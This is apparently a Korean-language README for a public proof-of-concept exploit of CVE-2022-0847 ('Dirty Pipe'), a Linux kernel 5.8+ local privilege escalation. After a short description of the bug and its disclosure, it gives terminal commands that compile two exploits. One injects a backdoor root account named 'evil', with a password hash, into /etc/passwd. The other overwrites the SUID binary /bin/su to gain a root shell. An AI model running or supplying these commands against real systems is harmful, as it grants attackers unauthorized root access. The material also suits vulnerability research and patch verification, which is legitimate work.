
CVE-2022-0847(Dirty Pipe)에 대한 개념 증명 익스플로잇으로, 읽기 전용 파일이나 SUID 바이너리를 덮어써서 Linux 커널 5.8 이상에서 로컬 권한 상승을 가능하게 합니다.
오늘, 보안 연구원 Max Kellermann이 'Dirty Pipe' 취약점을 책임 있게 공개했으며, 이 취약점은 Android 기기를 포함한 Linux 커널 5.8 이상 버전에 영향을 미친다고 밝혔습니다.
이 취약점은 CVE-2022-0847로 추적되며, 권한이 없는 사용자가 읽기 전용 파일(루트로 실행되는 SUID 프로세스 포함)에 데이터를 주입하고 덮어쓸 수 있습니다.
Kellermann은 한 고객의 웹 서버 액세스 로그를 손상시키는 버그를 추적한 후 이 버그를 발견했습니다.
이후 Bl4sty가 다른 버전을 작성했습니다. /etc/passwd와 같은 파일을 덮어쓰는 대신, 사용자가 지정한 SUID 바이너리(예: /bin/su)를 덮어쓰고 셸코드를 주입하여, 이후 권한 있는 사용자(즉, 루트) 권한으로 실행되게 합니다.
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
자세한 사용법은 다음을 참조하세요: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf